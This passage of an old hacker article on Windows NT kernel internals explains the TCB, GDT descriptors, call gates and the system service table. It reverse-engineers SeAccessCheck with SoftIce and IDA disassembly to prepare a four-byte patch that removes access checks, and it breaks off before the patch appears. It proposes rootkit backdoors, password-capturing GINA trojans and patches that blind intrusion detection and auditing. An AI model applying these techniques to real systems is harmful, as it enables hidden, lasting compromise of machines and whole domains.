+target operating system.
+
+To illustrate this, I have included in this document a 4-byte patch to the NT
+kernel that removes ALL security restrictions from objects within the NT
+domain.  If this patch were applied to a running PDC, the entire domain's
+integrity would be violated.  If this patch goes unnoticed for weeks or even
+months, it would be next to impossible to determine the damage.
+
+
+Network based security & the Windows NT Trust Domain
+----------------------------------------------------
+
+If you know much about the NT Kernel, you know that one of the executive
+components is called the Security Reference Monitor (SRM).  The DoD Red Book
+also defines a "Security Reference Monitor".  We are talking the same language.
+In the Red Book, a security domain is managed by a single entity.
+
+To Quote:
+"A single trusted system is accredited as a single entity by a single
+accrediting authority.  A ``single trusted system'' network implements a
+reference monitor to enforce the access of subjects to objects in accordance
+with an explicit and well defined network security policy [DoD Red Book]."
+
+In NT parlance, that is called the Primary Domain Controller (PDC).  Remember
+that every system has local security and domain security.  In this case, we are
+talking about the domain security.  The PDC's "Security Reference Monitor" is
+responsible for managing all of the objects within the domain.  In doing this,
+it creates a single point of control, and therefore a "single trusted system"
+network.
+
+
+How to violate system integrity
+-------------------------------
+
+I know this is alot of book theory, but bear with me just a bit longer.  The
+DoD Orange Book also defines a "Trusted Computing Base" (TCB).  If you are an
+NT programmer, then you have likely worked with the security privilege
+SE_TCB_PRIVILEGE.  That privilege maps to the more familiar "act as part of the
+Operating System" User-Right.  Using the User Administrator for NT you can
+actually add this privilege to a user.
+
+If you have the ability to act as part of the TCB, you can basically do
+anything.  There is very little security implemented between your process and
+the rest of the machine.  If the TCB can no longer be trusted, then the
+integrity of the entire network system is shot.  The patch I am about to show
+you is an example of this.  The patch, if installed on a Workstation, violates
+a network "partition".  The patch, if installed on a PDC, violates the entire
+network's integrity.
+
+What is a partition?
+
+The Red Book breaks the network into NTCB (Network Trusted Computing Base)
+"Partitions".  Any single component or machine on the network may be considered
+a "partition".  This makes it convenient for analysis.
+
+To Quote:
+"An NTCB that is distributed over a  number  of  network components is referred
+to as partitioned, and that part of the NTCB residing in a given component is
+referred to as an NTCB partition.  A network host may possess a TCB that has
+previously been evaluated as a stand-alone system.  Such a TCB does not
+necessarily coincide with the NTCB partition in the host, in the sense of
+having the same security perimeter [DoD Red Book]."
+
+On the same host you may have two unique regions, the TCB, which is the
+traditional Orange Book evaluation for Trusted Computing Base, and the NTCB.
+These partitions do not have to overlap, but they can.  If any component of one
+is violated, it is likely that the other is as well.  In other words, if a host
+is compromised, the NTCB may also be compromised.
+
+Obviously to install a patch over the TCB, you must already be Administrator,
+or have the ability to install a device driver.  Given that Trojans and Virii
+work so well, it would be very easy to cause this patch to be installed w/o
+someone's knowledge.
+
+
+Imagine an exploit
+------------------
+
+Before I digress into serious techno-garble, consider some of the attacks that
+are possible by patching the NT kernel.  All of these are possible because we
+have violated the TCB itself:
+
+1. Insert invalid data.  Invalid data can be inserted into any network stream.
+   It can also introduce errors into the fixed storage system, perhaps subtly
+   over time, such that even the backups get corrupted.  This violates
+   reliability & integrity.
+
+2. Patch incoming ICMP.  Using ICMP as a covert channel, the patch can read
+   ICMP packets coming into the kernel for embedded commands.
+
+3. Patch incoming ethernet.  It can act as a sniffer, but without all of the
+   driver components.  If it has patched the ethernet, then it can also stream
+   data in/out of the network.  It can sniff crypto keys.
+
+4. Patch existing DLL's, such as wininet.dll, capturing important data.
+
+5. Patch the IDS system.   It can patch a program such as Tripwire or
+   RealSecure to violate its integrity, rendering the program unable to detect
+   the nastiness...
+
+6. Patch the auditing system, i.e., event log, to ignore certain event log
+   messages.
+
+Now for the rare steak.  Let's delve into an actual kernel patch.  If you
+already understand protected mode and the global descriptor table, then you can
+skip this next section.  Otherwise put on your hiking boots, there are a couple
+of switchbacks ahead.
+
+
+Rings of Power
+--------------
+
+Windows NT is unlike DOS or Windows 95 in that it has process-space security.
+Every user-mode process has an area of memory that is protected by a Security
+Descriptor.  Usually this SD is determined from the Access Token of the user
+that started the process.  Access to all objects is handled through a "Access
+Control List".  For Windows NT, this is called "Discretionary Access Control".
+Personally I find it really hard to grasp something if I don't understand it's
+most basic details.  So, this next section describes the very foundation that
+makes security possible on the x86 architecture.
+
+First, it is important to understand "protected mode".  Protected mode can only
+be understood by memory addressing.  Almost all of the expanded capabilities of
+the x86 processor are built upon memory addressing.  Protected mode gives you
+access to a 4 GB memory space.  Multitasking and privilege levels are all
+based upon tricks with memory addressing.  This discussion only applies to 386
+and beyond.
+
+Memory is divided into code and data segments.  In protected mode, all memory
+is addressed as a segment + an offset.  Conversely, in real mode, everything is
+interpreted as an actual address.  For our discussion, we only care about
+protected mode.  In protected mode things get a little more complicated.  We
+must address first the segment, followed by an offset into that segment.  It
+is sort of a two step process.  Why is this interesting??  This is how most
+modern operating systems work, and it is important for exploits and Virii.  Any
+modern mobile code must be able to work within this arena.
+
+What is a selector?
+
+A selector is just a fancy word for a memory segment.  Memory segments are
+organized by a table.  These table entries are often called descriptors.  So,
+remember, a selector is-a segment is-a descriptor.  It's all the same thing.
+
+If you understand how the memory segments are kept track of, then you pretty
+much understand the whole equation.   Every memory segment is first a virtual
+address (16-bits) plus an offset from that address (32-bits).  A segment is not
+an actual address, like in realmode, but the number of a selector it wants to
+use.  A selector is usually a small integer number.  This small number is an
+offset into a table of descriptors.  In turn, the descriptor itself then has
+the actual linear address of the beginning of the memory segment.  In addition
+to that, the descriptor has the access privilege of the memory segment.
+
+Descriptors are stored in a table called the Global Descriptor Table (GDT).
+Each descriptor has a Descriptor Privilege Level (DPL), indicating what ring
+the memory segment runs in.
+
+Suffice it to say, the selector is your vehicle.  Under NT and 95, there
+are selectors which cover the entire 4GB address range.  If you were using
+one of these selectors, you could walk all over the memory map from 0 to
+whatever.  These selectors do exist, and they are protected by a DPL of 0.
+Under Windows 9x, selector 28 is a ring 0 that covers the entire 4gb region.
+Under NT, selectors 8 and 10 achieve the same purpose.
+
+Dumping the GDT from SoftIce produces a table similar to this:
+
+GDTBase=80036000 Limit=0x03FF
+
+0008  Code32   00000000  FFFFFFFF  0     P   RE
+0010  Data32   00000000  FFFFFFFF  0     P   RW
+001B  Code32   00000000  FFFFFFFF  3     P   RE
+0023  Data32   00000000  FFFFFFFF  3     P   RW
+0028  TSS32    8001D000  000020AB  0     P   B
+0048  Reserved 00000000  00000000  0     NP
+0060  Data16   00000400  0000FFFF  3     P   RW
+etc, etc ....
+
+You can see what segment you are currently using by checking the CPU registers.
+The registers SS, DS, and CS indicate which selectors are being used for Stack
+Segment, Code Segment, and Data Segment.  The stack and code segments must be
+in the same ring.
+
+1. Segments can overlap one another.  In other words, more than one segment can
+represent the same address-space.  Segments can overlap one another wholly, or
+only in part.  The address range for a segment is important, of course, but
+there is other delicious information we care about.  For instance, a segment
+also has a Privilege Level (DPL).
+
+ ----     ----
+|    |   |    |
+|    |   |    |
+|    |    ----
+|    |         ----
+|    |        |    |
+|    |        |    |
+ ----         |    |
+              |    |
+               ----
+
+What is a DPL?
+
+Descriptor Privilege Level.  This is important to understand.  Every memory
+segment is protected by a privilege level, often called a "ring".  The Intel
+processor has 4 rings, 0 through 3, usually only ring 0 and 3 are used.  Lower
+ring levels have more privilege.  In order to access a memory segment, the
+caller must have a current privilege level equal to or lower than the one being
+accessed.  Current privilege level is often called CPL, and descriptor
+privilege level is often called DPL.
+
+This type of protection is a requirement for almost any security architecture.
+In the old days of DOS, mobile code such as virii were able to hook interrupts
+and execute any code at whim.  They were walking all over the memory map at
+will.  No such luck with the advent of Windows NT.  There's a gaping need for
+Windows NT exploits that can take advantage of the old tricks.  The central
+problem is that most code is executing within user mode, and has not access to
+ring 0, and therefore no access to the Interrupt Descriptor Table or the
+memory map as a whole.
+
+Under NT, the access to ring 0 is controlled from the right to add your own
+selector to the GDT.  When you transition to ring 0, you are still in protected
+mode and the Virtual Memory Manager is still operating.
+
+Lets suppose you have written a virus that patches the Global Descriptor Table
+(GDT) and adds a new descriptor.  This new descriptor describes a memory
+segment that covers the entire range of the map, from 0 to FFFFFFFF___.  The
+DPL of the descriptor is 0, so any code running from it can access other ring-0
+segments.  In fact, it can access the entire map.  A DPL 0 memory segment
+marked as "conforming" will violate integrity.  The sensitivity label, in this
+regard, would be the DPL.  The fact it is conforming violates the DPL's of
+other segments, if they overlap.
+
+If your descriptor is marked conforming, it can be called freely from ring-3
+(user mode).  This new entry goes unnoticed, of course.  Who monitors the GDT
+on their system?  Most people don't even know what that is.  There are few IDS
+systems that monitor this type of information.  Now you have effectively placed
+a backdoor into the memory map.  You could be running under any process token,
+and have full read/write access to the map.  This means reading/writing other
+important tables, such as the Interrupt Table.  This means reading other
+procii's protected memory.  This means infecting other files and procii w/ your
+virii at whim.
+
+
+Patching the SRM
+----------------
+
+The Security Reference Monitor is responsible for enforcing access control.
+Under NT, all of the SRM functions are handled by ntoskrnl.exe.  If the
+integrity of that code were violated, then the SRM could no longer be trusted.
+The whole security system has failed.
+
+The Security Reference Monitor is responsible for saying Yes/No to any object
+access.  It consults a process table to determine your current running process'
+access token.  It then compares the access token with the required access of
+the object.  Every object has a Security Descriptor (SD).  Your running 
+process has an Access Token.  Comparing these two structures, the SRM is able 
+to deny or allow you access to the object.
+
+orange book:
+"In October of 1972, the Computer Security Technology Planning Study, conducted
+by James P.  Anderson & Co., produced a report for the Electronic Systems
+Division (ESD) of the United States Air Force.[1]  In that report, the concept
+of "a reference monitor which enforces the authorized access relationships
+between subjects and objects of a system" was introduced.  The reference
+monitor concept was found to be an essential element of any system that would
+provide multilevel secure computing facilities and controls."
+
+It then listed the three design requirements that must be met by a reference
+validation mechanism:
+     a. The reference validation mechanism must be tamper proof.
+     b. The reference validation mechanism must always be invoked.
+     c. The reference validation mechanism must be small enough to be
+        subject to analysis and tests, the completeness of which can
+        be assured."[1]
+
+The SRM is *NOT* tamper proof.  It may be protected by the TCB security
+privilege, but I suggest that the only truly tamper-proof SRM is going to use
+cryptographic mechanisms.  Using an attack vector such as Virii or Trojan's, a
+patch could easily be placed within the TCB.
+
+You can patch the SRM itself if you have access to the map.  In this, you can
+insert a backdoor such that a certain user-id ALWYAS has access.  However, this
+does not require you to edit the user's security level in any way.  You are
+patching it at the access point, not the source.  So, auditing programs will
+not be able to notice the problem.  This is a simple trick that could be
+employed in any NT RootKit.
+
+There are several key components to the NT Kernel.  They are sometimes
+referred to as the "NT Executive".  The NT executive is really a group of
+individual components with a well defined interface.  Each component has such a
+well defined interface, in fact, that you could actually take it out completely
+and replace it with a new one.  As long as the new component implemented all of
+the same interfaces, then the system would continue to function.  The following
+are all components of the NT Executive:
+
+   HAL: Hardware Abstraction Layer, HAL.DLL
+   NTOSKERNL:  Contains several components, NTOSKRNL.EXE
+      The Virtual Memory Manager (VMM)
+      The Security Reference Monitor (SRM)
+      The I/O Manager
+      The Object Manager
+      The Process and Thread Manager
+      The Kernel Services themselves
+       -(Exception handling and runtime library)
+      LPC Manager (Local Procedure Call)
+
+Hey, these are some of the modules listed when a Blue Screen occurs!  The
+system is just a big memory map!
+
+With all of this data we are bound to find structures of interest!  Many key
+data structures are crucial to security.  Once we know what we are looking for,
+we can get into SoftIce and start poking around.  A list of the exported
+functions for some of these components is in Appendix A.
+
+Using a tool such as SoftIce, reverse engineering the SRM and other components
+is easy ;)  The methodology is simple.  First, we must find the component we
+are interested in.  They all sit in system memory at some point...
+
+Some key data structures are:
+    ACL (Access Control List), contains ACE's
+    ACE (Access Control Entry), has a 32-bit Access Mask and a SID
+    SID (Security Identifier), a big number
+    PTE (Page Table Entry)
+    SD  (Security Descriptor), has an Owner SID, a Group SID, and an ACL
+    AT  (Access Token)
+
+Now for some tricks!  The first thing we need to do is identify which of these
+data structures we will be using.  If we want to reverse engineer the Security
+Reference Monitor, then we can be assured that our SID is going to be used in
+some call somewhere.. This is where SoftIce comes in.  SoftIce has an
+incredible feature called expressions.  SoftIce will let you define a regular
+expression to be evaluated for a breakpoint.  In other words, I can tell
+SoftIce to break if only a special set of circumstances has occurred.
+
+So, for example (working implementation):
+
+1. I want softice to break if the ESI register references my SID.  Since a SID
+is many words long, I will have to define the expression in several portions:
+
+bpx (ESI->0 == 0x12345678) && (ESI->4 == 0x90123456) && (ESI->8 == 0x78901234)
+
+What I have done here is tell softice to break if the ESI register points to
+the data: 0x123456789012345678901234.  Notice how I use the -> operator to
+offset ESI for each word.
+
+Now, try to access an object.  SoftIce will promptly break when your SID is
+used in a call.
+
+There are many system components that are worth reverse engineering.  You may
+also want to play with the following:
+    1. GINA, (GINA.DLL) The logon screen you see when you type your
+       password. Imagine if this component was trojaned.. A Virii could
+       capture passwords across the enterprise.
+    2. LSA (The Local System Authority) This is the module responsible for
+       querying the SAM database.  This would be an ideal place to put a
+       rootkit-password that *ALWAYS* allows you access to the system.
+    3. SSDT, The System Service Descriptor Table
+    4. GDT, the Global Descriptor Table
+    5. IDT, the Interrupt Descriptor Table
+
+
+Getting to ring zero in the first place
+---------------------------------------
+
+User mode is very limiting under NT.  Your process is bound by the selector it
+is currently using.  The process cannot simply waltz over the entire memory
+map.  As we have discussed, the process must first load a selector.  You cannot
+simply read memory from 0 to FFF_, you can only access your own memory segment.
+
+There are tricks however.  If the process is running under a user token that
+has "add service" privilege, then you can create your own call gate, install
+it in realtime, and then use it to run your code ring 0.  Once you are running
+ring 0 you can patch the IDT or the Kernel.  This is how User-Mode normally
+accesses a Ring-0 Code Segment.  If you don't want to go to this trouble,
+you can upload a byte patcher that runs in ring zero on boot.  This is as
+simple as writing a driver and installing to run on the next reboot.
+However, installing your own call-gate is by far the most sexy.
+
+Lets talk sexy.  The answer is a call gate.  All of the functions provided by
+NTDLL.DLL are implemented this way.  This is why you must call Int 2Eh to make
+a call.  The entire set of Int 2Eh functions are known as the Native Call
+Interface (NCI).  What really happens is the Int 2Eh is handled by a function
+in NTOSKRNL.EXE.  This function is called KiSystemService().  
+KiSystemService() routes the call to the proper code location.
+
+When you make a system call, you must first load the index of the function you
+wish to call.  This is loaded into register EAX.  Next, if the call takes
+parameters, a pointer to this block is loaded into EDX.  Interrupt 2Eh is
+called, and EAX holds the return value.  This is old hat to most assembler
+programmers.
+
+What is not obvious is how this is implemented in the Kernel.  The function
+KiSystemService() is called, and left with the responsibility for dispatching
+the call.  KiSystemService() must first determine *WHAT* function to call next,
+based on what we put in EAX.  So, to this end, it maintains a table of
+functions and their index numbers.. imagine that!  SofIce will dump this table
+if your interested.  It looks something like:
+
+:ntcall
+Service table address: 80149398  Number of services:000000D4
+0000  0008:8017451E  params=06  ntoskrnl!NtConnectPort+0834
+0001  0008:80199C16  params=08  ntoskrnl!SeQueryAuthenticationIdToken+04B8
+0002  0008:8019B3A2  params=0B  ntoskrnl!SePrivilegeObjectAuditAlarm+02B0
+0003  0008:80158E50  params=02  ntoskrnl!NtAddAtom
+0004  0008:80197624  params=06  ntoskrnl!NtAdjustPrivilegesToken+0422
+0005  0008:80197202  params=06  ntoskrnl!NtAdjustPrivilegesToken
+0006  0008:80196256  params=02  ntoskrnl!PsGetProcessExitTime+1848
+0007  0008:8019620E  params=01  ntoskrnl!PsGetProcessExitTime+1800
+0008  0008:8015901E  params=01  ntoskrnl!NtAllocateLocallyUniqueId
+0009  0008:801592EC  params=03  ntoskrnl!NtAllocateUuids
+000A  0008:8017B0F6  params=06  ntoskrnl!NtAllocateVirtualMemory
+000B  0008:8011B8E4  params=03  ntoskrnl!ZwYieldExecution+08AC
+etc etc...
+
+Well, this is all very interesting, but where is this table stored?  How does
+SoftIce manage to read it?  Of course, it's all undocumented ;-)  Here I have
+no one to thank more than my friend from Sri Lanka, a fellow Rhino9 member, who
+goes by the handle Joey__.  His paper on extending the NCI is nothing less than
+mind-blowing.  I draw heavily upon his research for this section.  I feel this
+paper could not be complete without going over call-gates and the NCI, so I
+paraphrase some of his work.  For more detailed information on adding your own
+system services, read his paper entitled "Adding New Services to the NT Kernel
+Native API".
+
+A very interesting thing happens when you boot NT.  You start with about 200
+functions in the NCI.  These are all implemented in NTOSKRNL.EXE.  But, soon
+afterwards, another 500 or so functions are added to the NCI, these being
+implemented in WIN32K.SYS.  The fact that additional functions were added
+proves that it is possible to register new functions into the NCI during
+runtime.
+
+The table that SoftIce dumps when you type NTCALL is called the System Service
+Descriptor Table (SSDT).  The SSDT is what the KiSystemService() function uses
+to look up the proper function for a Int 2Eh call.  Given that the NCI is
+extensible, it must be possible to add new functions to this table.
+
+As it turns out, there are actually multiple tables.  WIN32K.SYS doesn't
+actually add to the EXISTING system table, but creates a whole NEW one with 500
+or so functions, and then ADDS it to the Kernel.  To do this, it calls the
+exported function KeAddSystemServiceTable().  So, in a nutshell, all we have to
+do is create a new table with OUR functions and do the same thing.
+
+Another angle on this involves adding our functions to the existing NCI table.
+But, this involves patching memory.  Again, that's what we do best.  To pull
+this trick off cleanly, we must allocate new memory large enough to hold the
+old tables plus our additional entries.  We then must copy the old tables 
+into our new memory, add our entries, and then patch memory so that 
+KiSystemService() looks at our new table.
+
+
+The FOUR-Byte Patch
+-------------------
+
+Okay, lesson number one.  Don't make yourself do extra work when you don't have
+to.  This is the story of my life.  I started this project by reversing the
+RtlXXX subroutines.  For instance, there is a routine called
+RtlGetOwnerSecurityDescriptor().  This is a simple utility function that
+returns the Owner SID for a given security descriptor.  I patched this routine
+to check for the BUILTIN\Administrators group, and alter it to be the
+BUILTIN\Users group.  Although this patch works, it doesn't help me obtain
+access to protected files and shares.  The RTL routine is only called for
+Process and Thread creation, it would seem.  So, to make a long story short, I
+have included the RTLXXX information and patch below.  It will illustrate a
+working kernel patch and should help you see my thought process as I 0wned a
+key kernel function.
+
+Okay, lesson number two.  If at first you don't succeed, try another function.
+This time I got very wise and decided to test a number of breakpoints in the
+Kernel before doing any extra work. Because I wanted to circumvent access to a
+file directly, I moved directly onward to the SeAccessCheck() function.  Up
+front, I set a breakpoint on this function to make sure it is being called when
+accessing a file.  To my excitement, it appears this function is called for
+almost any object access, not just a file.  This means network shares as well.
+Going further, I tested my next patch against network share access as well as
+file access.  I created a test directory, shared it over the network, and
+created a test file within that directory.
+
+At first, the file had the default Everyone FULL CONTROL permissions.  I set a
+breakpoint on SeAccessCheck() and attempted to cat the file. For this simple
+command the function is called three times:
+
+Break due to BPX ntoskrnl!SeAccessCheck  (ET=2.01 seconds)
+:stack
+Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D1C)
+=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711734)
+Break due to BPX ntoskrnl!SeAccessCheck  (ET=991.32 microseconds)
+:stack
+Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711CB8)
+=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD7116D8)
+Break due to BPX ntoskrnl!SeAccessCheck  (ET=637.15 microseconds)
+:stack
+Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D08)
+=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711720)
+
+Next I set the file access to Administrator NO ACCESS.  Attempting to cat the
+file locally resulted in an "Access Denied" message. The routine is called 13
+times before the Access Denied message is given.  Now I try to access it over
+the network.  The function is called a total of 18 times before a Access Denied
+message is given.  It would seem it takes alot more work to deny access than it
+does to give it. ;)
+
+I was lit now, it looked like I had my target.  After another 2 shots of
+espresso, I dumped the IDA file for SeAccessCheck, busted into SoftIce and
+started exploring:
+
+To make things simpler, I have removed some of the assembly code that is not
+part of my discussion.  If you are going to start playing with this, then you
+should disassemble all of this yourself nonetheless.  I recommend IDA.  At
+first I tried WDAsm32, but it was unable to decompile the ntoskrnl.exe 
+binary properly.  IDA, on the other hand, had no problems.  WDAsm32 has a 
+much nicer GUI interface, but IDA has proved more reliable.  Just as most 
+engineers, I use many tools to get the job done, so I recommend having both
+disassemblers around.
+
+
+The function & patches:
+8019A0E6 ; Exported entry 816. SeAccessCheck
+8019A0E6
+8019A0E6 ;
+===========================================================================
+8019A0E6
+8019A0E6 ;		 S u b r o u t i n e
+8019A0E6 ; Attributes: bp-based	frame
+8019A0E6
+8019A0E6		 public	SeAccessCheck
+8019A0E6 SeAccessCheck	 proc near
+8019A0E6					 ; sub_80133D06+B0p ...
+8019A0E6
+8019A0E6 arg_0		 = dword ptr  8		 ; appears to point to a
+						 ; Security Descriptor
+8019A0E6 arg_4		 = dword ptr  0Ch
+8019A0E6 arg_8		 = byte	ptr  10h
+8019A0E6 arg_C		 = dword ptr  14h
+8019A0E6 arg_10		 = dword ptr  18h
+8019A0E6 arg_14		 = dword ptr  1Ch
+8019A0E6 arg_18		 = dword ptr  20h
+8019A0E6 arg_1C		 = dword ptr  24h
+8019A0E6 arg_20		 = dword ptr  28h
+8019A0E6 arg_24		 = dword ptr  2Ch
+8019A0E6
+8019A0E6		 push	 ebp
+8019A0E7		 mov	 ebp, esp
+8019A0E9		 push	 ebx
+8019A0EA		 push	 esi
+8019A0EB		 push	 edi
+8019A0EC		 cmp	 byte ptr [ebp+arg_1C],	0
+8019A0F0		 mov	 ebx, [ebp+arg_C]
+8019A0F3		 jnz	 short loc_8019A137
+8019A0F5		 test	 ebx, 2000000h
+8019A0FB		 jz	 short loc_8019A11D
+8019A0FD		 mov	 eax, [ebp+arg_18]
+8019A100		 mov	 edi, [ebp+arg_20]
+8019A103		 mov	 ecx, ebx
+8019A105		 mov	 eax, [eax+0Ch]
+8019A108		 and	 ecx, 0FDFFFFFFh
+8019A10E		 mov	 [edi],	eax
+8019A110		 or	 ecx, eax
+8019A112		 mov	 eax, [ebp+arg_10]
+8019A115		 or	 eax, ecx
+8019A117		 mov	 [edi],	ecx
+8019A119		 mov	 [edi],	eax
+8019A11B		 jmp	 short loc_8019A13A
+8019A11D ;
+===========================================================================
+8019A11D
+8019A11D loc_8019A11D:				 ; CODE	XREF: SeAccessCheck+15
+8019A11D		 mov	 eax, [ebp+arg_10]
+8019A120		 mov	 edi, [ebp+arg_20]
+8019A123		 or	 eax, ebx
+8019A125		 mov	 edx, [ebp+arg_24]
+8019A128		 mov	 [edi],	eax
+8019A12A		 mov	 al, 1
+8019A12C		 mov	 dword ptr [edx], 0
+8019A132		 jmp	 loc_8019A23A
+8019A137 ;
+===========================================================================
+8019A137
+8019A137 loc_8019A137:				 ; CODE	XREF: SeAccessCheck+D
+8019A137		 mov	 edi, [ebp+arg_20]
+8019A13A
+8019A13A loc_8019A13A:				 ; CODE	XREF: SeAccessCheck+35
+8019A13A		 cmp	 [ebp+arg_0], 0
+8019A13E		 jnz	 short loc_8019A150
+8019A140		 mov	 edx, [ebp+arg_24]
+8019A143		 xor	 al, al
+				 ; STATUS_ACCESS_DENIED not hit
+				 ; under normal means
+8019A145		 mov	 dword ptr [edx], 0C0000022h
+8019A14B		 jmp	 loc_8019A23A
+8019A150 ;
+===========================================================================
+8019A150
+8019A150 loc_8019A150:				 ; CODE	XREF: SeAccessCheck+58
+8019A150		 mov	 esi, [ebp+arg_4]
+8019A153		 cmp	 dword ptr [esi], 0
+8019A156		 jz	 short loc_8019A16E
+8019A158		 cmp	 dword ptr [esi+4], 2
+8019A15C		 jge	 short loc_8019A16E
+8019A15E		 mov	 edx, [ebp+arg_24]
+8019A161		 xor	 al, al
+				 ; STATUS_BAD_IMPERSONATION_LEVEL
+				 ; not normally hit
+8019A163		 mov	 dword ptr [edx], 0C00000A5h
+8019A169		 jmp	 loc_8019A23A
+8019A16E ;
+===========================================================================
+8019A16E
+8019A16E loc_8019A16E:				 ; CODE	XREF: SeAccessCheck+70
+8019A16E					 ; SeAccessCheck+76
+8019A16E		 test	 ebx, ebx
+8019A170		 jnz	 short loc_8019A1A0
+8019A172		 cmp	 [ebp+arg_10], 0
+8019A176		 jnz	 short loc_8019A188
+8019A178		 mov	 edx, [ebp+arg_24]
+8019A17B		 xor	 al, al
+				 ; STATUS_ACCESS_DENIED not
+				 ; normally hit
+8019A17D		 mov	 dword ptr [edx], 0C0000022h
+8019A183		 jmp	 loc_8019A23A
+8019A188 ;
+===========================================================================
+8019A188
+8019A188 loc_8019A188:				 ; CODE	XREF: SeAccessCheck+90
+8019A188		 mov	 eax, [ebp+arg_10]
+8019A18B		 xor	 ecx, ecx
+8019A18D		 mov	 edx, [ebp+arg_24]
+8019A190		 mov	 [edi],	eax
+8019A192		 mov	 eax, [ebp+arg_14]
+8019A195		 mov	 [edx],	ecx
+8019A197		 mov	 [eax],	ecx
+8019A199		 mov	 al, 1
+8019A19B		 jmp	 loc_8019A23A
+8019A1A0 ;
+===========================================================================
+8019A1A0
+8019A1A0 loc_8019A1A0:				 ; CODE	XREF: SeAccessCheck+8A
+8019A1A0		 cmp	 [ebp+arg_8], 0
+8019A1A4		 jnz	 short loc_8019A1AC
+8019A1A6		 push	 esi
+8019A1A7		 call	 SeLockSubjectContext
+8019A1AC
+8019A1AC loc_8019A1AC:				 ; CODE	XREF: SeAccessCheck+BE
+8019A1AC		 test	 ebx, 2060000h
+8019A1B2		 jz	 short loc_8019A1EA
+8019A1B4		 mov	 eax, [esi]
+8019A1B6		 test	 eax, eax
+8019A1B8		 jnz	 short loc_8019A1BD
+8019A1BA		 mov	 eax, [esi+8]
+8019A1BD
+8019A1BD loc_8019A1BD:				 ; CODE	XREF: SeAccessCheck+D2
+8019A1BD		 push	 1
+8019A1BF		 push	 [ebp+arg_0]
+8019A1C2		 push	 eax
+8019A1C3		 call	 sub_8019A376
+8019A1C8		 test	 al, al
+8019A1CA		 jz	 short loc_8019A1EA
+8019A1CC		 test	 ebx, 2000000h
+8019A1D2		 jz	 short loc_8019A1DA
+8019A1D4		 or	 byte ptr [ebp+arg_10+2], 6
+8019A1D8		 jmp	 short loc_8019A1E4
+8019A1DA ;
+===========================================================================
+8019A1DA
+8019A1DA loc_8019A1DA:				 ; CODE	XREF: SeAccessCheck+EC
+8019A1DA		 mov	 eax, ebx
+8019A1DC		 and	 eax, 60000h
+8019A1E1		 or	 [ebp+arg_10], eax
+8019A1E4
+8019A1E4 loc_8019A1E4:				 ; CODE	XREF: SeAccessCheck+F2
+8019A1E4		 and	 ebx, 0FFF9FFFFh
+8019A1EA
+8019A1EA loc_8019A1EA:				 ; CODE	XREF: SeAccessCheck+CC
+8019A1EA					 ; SeAccessCheck+E4
+8019A1EA		 test	 ebx, ebx
+8019A1EC		 jnz	 short loc_8019A20C
+8019A1EE		 cmp	 [ebp+arg_8], 0
+8019A1F2		 jnz	 short loc_8019A1FA
+8019A1F4		 push	 esi
+8019A1F5		 call	 SeUnlockSubjectContext
+8019A1FA
+8019A1FA loc_8019A1FA:				 ; CODE	XREF: SeAccessCheck+10
+8019A1FA		 mov	 eax, [ebp+arg_10]
+8019A1FD		 mov	 edx, [ebp+arg_24]
+8019A200		 mov	 [edi],	eax
+8019A202		 mov	 al, 1
+8019A204		 mov	 dword ptr [edx], 0
+8019A20A		 jmp	 short loc_8019A23A
+8019A20C ;
+===========================================================================
+
+Since most of the arguments are being passed to this, it looks like this
+routine is a wrapper for this other one.. lets delve deeper....
+
+8019A20C
+8019A20C loc_8019A20C:				 ; CODE	XREF: SeAccessCheck+106
+8019A20C		 push	 [ebp+arg_24]
+8019A20F		 push	 [ebp+arg_14]
+8019A212		 push	 edi
+8019A213		 push	 [ebp+arg_1C]
+8019A216		 push	 [ebp+arg_10]
+8019A219		 push	 [ebp+arg_18]
+8019A21C		 push	 ebx
+8019A21D		 push	 dword ptr [esi]
+8019A21F		 push	 dword ptr [esi+8]
+8019A222		 push	 [ebp+arg_0]
+8019A225		 call	 sub_80199836		; decompiled below ***
+8019A22A		 cmp	 [ebp+arg_8], 0
+8019A22E		 mov	 bl, al
+8019A230		 jnz	 short loc_8019A238
+8019A232		 push	 esi
+8019A233		 call	 SeUnlockSubjectContext	 ; not usually hit
+8019A238
+8019A238 loc_8019A238:				 ; CODE	XREF: SeAccessCheck+14A
+8019A238		 mov	 al, bl
+8019A23A
+8019A23A loc_8019A23A:				 ; CODE	XREF: SeAccessCheck+4C
+8019A23A					 ; SeAccessCheck+65 ...
+8019A23A		 pop	 edi
+8019A23B		 pop	 esi
+8019A23C		 pop	 ebx
+8019A23D		 pop	 ebp
+8019A23E		 retn	 28h
+8019A23E SeAccessCheck	 endp
+
+
+Subroutine called from SeAccessCheck.  Looks like most of work is being done in
+here.  I will try to patch this routine.
+
+80199836 ;
+==============================================================================
+80199836
+80199836 ;		 S u b r o u t i n e
+80199836 ; Attributes: bp-based	frame
+80199836
+80199836 sub_80199836	 proc near		 ; CODE	XREF: PAGE:80199FFA
+80199836					 ; SeAccessCheck+13F ...
+80199836
+80199836 var_14		 = dword ptr -14h
+80199836 var_10		 = dword ptr -10h
+80199836 var_C		 = dword ptr -0Ch
+80199836 var_8		 = dword ptr -8
+80199836 var_2		 = byte	ptr -2
+80199836 arg_0		 = dword ptr  8
+80199836 arg_4		 = dword ptr  0Ch
+80199836 arg_8		 = dword ptr  10h
+80199836 arg_C		 = dword ptr  14h
+80199836 arg_10		 = dword ptr  18h
+80199836 arg_16		 = byte	ptr  1Eh
+80199836 arg_17		 = byte	ptr  1Fh
+80199836 arg_18		 = dword ptr  20h
+80199836 arg_1C		 = dword ptr  24h
+80199836 arg_20		 = dword ptr  28h
+80199836 arg_24		 = dword ptr  2Ch
+80199836
+80199836		 push	 ebp
+80199837		 mov	 ebp, esp
+80199839		 sub	 esp, 14h
+8019983C		 push	 ebx
+8019983D		 push	 esi
+8019983E		 push	 edi
+8019983F		 xor	 ebx, ebx
+80199841		 mov	 eax, [ebp+arg_8]	; pulls eax
+80199844		 mov	 [ebp+var_14], ebx	; ebx is zero, looks
+							; like it init's a
+							; bunch of local vars
+80199847		 mov	 [ebp+var_C], ebx
+8019984A		 mov	 [ebp-1], bl
+8019984D		 mov	 [ebp+var_2], bl
+80199850		 cmp	 eax, ebx		; check that arg8 is
+							; NULL
